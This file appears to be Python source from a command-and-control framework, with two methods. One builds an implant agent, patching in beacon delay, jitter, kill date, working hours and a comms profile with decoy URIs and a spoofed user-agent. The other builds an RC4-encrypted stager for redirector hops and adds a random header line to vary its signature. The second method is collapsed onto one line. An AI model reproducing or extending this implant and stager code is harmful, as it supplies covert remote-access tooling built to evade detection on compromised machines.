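def generate_agent(self, delay, jitter, profile, killDate, workingHours, lostLimit):
    """
    Generate "standard API" functionality, i.e. the actual agent.py that runs.

    Reads ``./data/agent/agent.py`` relative to ``self.installPath``, strips
    comments and blank lines, and patches the supplied configuration values
    into the source by plain string replacement of the template defaults.
    This should always be sent over encrypted comms.

    Args:
        delay: substituted for the template line ``delay = 60``.
        jitter: substituted for ``jitter = 0.0``.
        profile: comms profile string, substituted for the template's default
            ``profile = "..."`` line.
        killDate: substituted for ``killDate = ""`` only when non-empty.
        workingHours: substituted for ``workingHours = ""`` only when non-empty.
        lostLimit: substituted for ``lostLimit = 60``.

    Returns:
        The patched agent source as a string.

    Raises:
        IOError / OSError if the agent template cannot be opened or read.
    """
    # context manager: the handle is released even if read() raises
    with open(self.installPath + "./data/agent/agent.py") as f:
        code = f.read()

    # strip out comments and blank lines
    code = helpers.strip_python_comments(code)

    # NOTE(review): on Python 3 b64encode() returns bytes and "%s" below would
    # embed the b'...' repr; this looks written for Python 2 — confirm.
    b64DefaultPage = base64.b64encode(http.default_page())

    # patch in the delay, jitter, lost limit, and comms profile.
    # NOTE: every value is spliced into Python source verbatim, with no quoting
    # or escaping.  A value containing a double quote or a newline produces a
    # syntactically broken (or altered) agent, so callers must validate inputs
    # before they reach here.
    code = code.replace('delay = 60', 'delay = %s' % (delay))
    code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
    code = code.replace('profile = "/admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"', 'profile = "%s"' % (profile))
    code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
    code = code.replace('defaultPage = base64.b64decode("")', 'defaultPage = base64.b64decode("%s")' % (b64DefaultPage))

    # patch in the killDate and workingHours if they're specified
    if killDate != "":
        code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
    if workingHours != "":
        # fix: the original substituted killDate here, so workingHours was
        # never honoured and the kill date was silently written in its place
        code = code.replace('workingHours = ""', 'workingHours = "%s"' % (workingHours))

    return code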
def generate_stager_hop(self, server, key, profile, encrypt=True, encode=True): """ Generate the Python stager for hop.php redirectors that will perform key negotiation with the server and kick off the agent. """ # read in the stager base f = open(self.installPath + "./data/agent/stager_hop.py") stager = f.read() f.close() stager = helpers.strip_python_comments(stager) # first line of randomized text to change up the ending RC4 string randomHeader = "%s='%s'\n" % (helpers.random_string(), helpers.random_string()) stager = randomHeader + stager # patch the server and key information stager = stager.replace("REPLACE_SERVER", server) stager = stager.replace("REPLACE_STAGING_KEY", key) stager = stager.replace("REPLACE_PROFILE", profile) stager = stager.replace("index.jsp", self.stage1) stager = stager.replace("index.php", self.stage2) # # base64 encode the stager and return it # if encode: # return "" if encrypt: # return an encrypted version of the stager ("normal" staging) # return encryption.xor_encrypt(stager, key) return encryption.rc4(key, stager) else: # otherwise return the case-randomized stager return stager